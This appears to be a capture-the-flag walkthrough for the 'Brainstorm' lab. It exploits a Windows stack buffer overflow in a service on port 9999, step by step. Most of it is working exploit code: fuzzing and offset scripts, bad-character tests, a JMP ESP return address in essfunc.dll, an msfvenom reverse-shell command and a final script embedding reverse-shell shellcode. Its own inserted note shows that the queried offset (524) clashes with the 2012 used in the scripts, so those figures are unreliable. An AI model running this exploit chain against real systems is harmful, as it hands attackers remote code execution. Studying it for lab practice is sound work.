coffeetohack
Brainstorm

Fuzzing: check whether we can overflow the buffer by sending a long string of "A"s.

import socket
import sys

username = b"pika"       # bytes, since socket.send() requires bytes
message = b"A" * 4000    # long input to trigger the overflow

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.101', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.send(username + b'\r\n')
    s.recv(1024)
    s.send(message + b'\r\n')
    s.recv(1024)
    s.close()
except OSError:
    print("Cannot connect")
    sys.exit()

Use msf-pattern_create to generate a unique, non-repeating pattern and overflow the buffer again, replacing the "A" string in the script with this pattern.

msf-pattern_create -l 5000

Check the value in the EIP register, then use msf-pattern_offset to find the position in the pattern that landed in EIP (the offset):

msf-pattern_offset -l 5000 -q 35724134
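As an added illustration (not code from the original page), the following re-implements the sequence msf-pattern_create emits and the lookup msf-pattern_offset performs, so you can see how the value shown in EIP becomes a padding length:

```python
import string
import struct

def pattern_create(length: int) -> bytes:
    """Same sequence msf-pattern_create emits: upper/lower/digit triplets
    Aa0Aa1...Aa9Ab0..., cut to `length` bytes. Every 4-byte window is unique
    within the first 20280 bytes, which is what makes the offset lookup work."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(eip_hex: str, length: int = 5000) -> int:
    """What msf-pattern_offset -q does: the value shown in EIP is a little-endian
    dword, so packing it with '<I' recovers the 4 pattern characters that were
    written over the saved return address; their position is the padding length."""
    needle = struct.pack("<I", int(eip_hex, 16))
    return pattern_create(length).find(needle)   # -1 if the value is not from the pattern

if __name__ == "__main__":
    print(pattern_offset("35724134"))   # 524
    print(pattern_offset("31704330"))   # 2012
```

Note that 35724134 decodes to the pattern bytes "4Ar5", which sit at offset 524, while the 2012 used in the scripts below corresponds to an EIP value of 31704330; always query the value you actually observe in EIP.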

Now use this offset value and try to overwrite EIP with "B":

import socket
import sys

username = b"pika"
message = b"A" * 2012 + b"B" * 4    # offset padding, then the 4 bytes that land in EIP

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.send(username + b'\r\n')
    s.recv(1024)
    s.send(message + b'\r\n')
    s.recv(1024)
    s.close()
except OSError:
    print("Cannot connect")
    sys.exit()

Check that EIP is now overwritten with 42424242. Next, find the bad characters; \x00 is treated as bad by default, so it is left out of the list below.

import socket
import sys

username = b"pika"
message = b"A" * 2012 + b"B" * 4
# every byte from \x01 to \xff, sent right after the EIP overwrite so it lands at ESP
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.send(username + b'\r\n')
    s.recv(1024)
    s.send(message + badchars + b'\r\n')
    s.recv(1024)
    s.close()
except OSError:
    print("Cannot connect")
    sys.exit()
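As an added example (not from the original page), this is the comparison you do by eye in the dump, written out: it walks the bytes read back from ESP against the bytes that were sent, reports the first mismatch, strips that byte and repeats until the dump matches. fake_service is a constructed stand-in for the target and is not Brainstorm's real behaviour.

```python
ALL_CHARS = bytes(range(0x01, 0x100))   # everything except \x00, as on the page

def first_bad_char(sent: bytes, dumped: bytes):
    """Return (position, byte) of the first place the dump differs from what
    was sent, or None if everything arrived intact. Only the first mismatch is
    trustworthy: a mangled byte often shifts or truncates all that follows,
    so drop it, resend and compare again."""
    for i, (want, got) in enumerate(zip(sent, dumped)):
        if want != got:
            return i, want
    if len(dumped) < len(sent):   # dump cut short: the next byte ended the input
        return len(dumped), sent[len(dumped)]
    return None

def find_bad_chars(fetch_dump, chars=ALL_CHARS, max_rounds=16):
    """Repeat send/compare until the dump matches. fetch_dump(payload) stands in
    for sending the payload and reading the bytes at ESP back out of the debugger."""
    bad, current = [], chars
    for _ in range(max_rounds):
        hit = first_bad_char(current, fetch_dump(current))
        if hit is None:
            break
        bad.append(hit[1])
        current = current.replace(bytes([hit[1]]), b"")
    return bad

def fake_service(payload: bytes) -> bytes:
    """Constructed stand-in for a target: \x0a terminates the input and \x0d is
    stored as \x00. Purely illustrative."""
    return payload.split(b"\x0a")[0].replace(b"\x0d", b"\x00")

if __name__ == "__main__":
    print(find_bad_chars(fake_service))   # [10, 13], i.e. \x0a and \x0d
```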

Right-click on ESP and choose Follow in Dump, then compare the bytes there with the ones sent to find the bad characters. Next, restart Immunity and the service, go to the command bar at the bottom and type:

!mona modules

This lists the loaded modules with their protection flags. Pick the module that has False across the board. Then do another search, this time for the opcode bytes \xff\xe4 (JMP ESP) inside that module:

!mona find -s "\xff\xe4" -m essfunc.dll

Check the Results section and note down the return address. Run the service, click on the blue arrow and enter the return address; this takes you to that location. Press F2 to set a breakpoint there, then run the following script (return address 625014DF):

import socket
import sys

username = b"pika"
message = b"A" * 2012 + b"\xdf\x14\x50\x62"    # return address 625014DF, packed little-endian

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.send(username + b'\r\n')
    s.recv(1024)
    s.send(message + b'\r\n')
    s.recv(1024)
    s.close()
except OSError:
    print("Cannot connect")
    sys.exit()

Check that EIP has been overwritten with the return address, and that the status bar at the bottom says Breakpoint at essfunc.625014DF. Then create an msfvenom payload to get a shell, passing every bad character you found to -b so that msfvenom excludes them:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "\x00" -f c 

Now run the following script to get a shell:

import socket
import sys

username = b"pika"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xbf\x6f\x90\x2c\xf7\xda\xdd\xd9\x74\x24\xf4\x5d\x33\xc9\xb1"
b"\x52\x31\x7d\x12\x03\x7d\x12\x83\x82\x6c\xce\x02\xa0\x65\x8d"
b"\xed\x58\x76\xf2\x64\xbd\x47\x32\x12\xb6\xf8\x82\x50\x9a\xf4"
b"\x69\x34\x0e\x8e\x1c\x91\x21\x27\xaa\xc7\x0c\xb8\x87\x34\x0f"
b"\x3a\xda\x68\xef\x03\x15\x7d\xee\x44\x48\x8c\xa2\x1d\x06\x23"
b"\x52\x29\x52\xf8\xd9\x61\x72\x78\x3e\x31\x75\xa9\x91\x49\x2c"
b"\x69\x10\x9d\x44\x20\x0a\xc2\x61\xfa\xa1\x30\x1d\xfd\x63\x09"
b"\xde\x52\x4a\xa5\x2d\xaa\x8b\x02\xce\xd9\xe5\x70\x73\xda\x32"
b"\x0a\xaf\x6f\xa0\xac\x24\xd7\x0c\x4c\xe8\x8e\xc7\x42\x45\xc4"
b"\x8f\x46\x58\x09\xa4\x73\xd1\xac\x6a\xf2\xa1\x8a\xae\x5e\x71"
b"\xb2\xf7\x3a\xd4\xcb\xe7\xe4\x89\x69\x6c\x08\xdd\x03\x2f\x45"
b"\x12\x2e\xcf\x95\x3c\x39\xbc\xa7\xe3\x91\x2a\x84\x6c\x3c\xad"
b"\xeb\x46\xf8\x21\x12\x69\xf9\x68\xd1\x3d\xa9\x02\xf0\x3d\x22"
b"\xd2\xfd\xeb\xe5\x82\x51\x44\x46\x72\x12\x34\x2e\x98\x9d\x6b"
b"\x4e\xa3\x77\x04\xe5\x5e\x10\xeb\x52\x60\x85\x83\xa0\x60\x5b"
b"\x35\x2c\x86\x09\xa5\x78\x11\xa6\x5c\x21\xe9\x57\xa0\xff\x94"
b"\x58\x2a\x0c\x69\x16\xdb\x79\x79\xcf\x2b\x34\x23\x46\x33\xe2"
b"\x4b\x04\xa6\x69\x8b\x43\xdb\x25\xdc\x04\x2d\x3c\x88\xb8\x14"
b"\x96\xae\x40\xc0\xd1\x6a\x9f\x31\xdf\x73\x52\x0d\xfb\x63\xaa"
b"\x8e\x47\xd7\x62\xd9\x11\x81\xc4\xb3\xd3\x7b\x9f\x68\xba\xeb"
b"\x66\x43\x7d\x6d\x67\x8e\x0b\x91\xd6\x67\x4a\xae\xd7\xef\x5a"
b"\xd7\x05\x90\xa5\x02\x8e\xa0\xef\x0e\xa7\x28\xb6\xdb\xf5\x34"
b"\x49\x36\x39\x41\xca\xb2\xc2\xb6\xd2\xb7\xc7\xf3\x54\x24\xba"
b"\x6c\x31\x4a\x69\x8c\x10")

try:
    print("sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.105', 9999))
    # s.recv(1024)
    # s.recv(1024)
    s.send(username + b'\r\n')
    s.recv(1024)
    s.send(message + payload + b'\r\n')
    s.recv(1024)
    s.close()
except OSError:
    print("Cannot connect")
    sys.exit()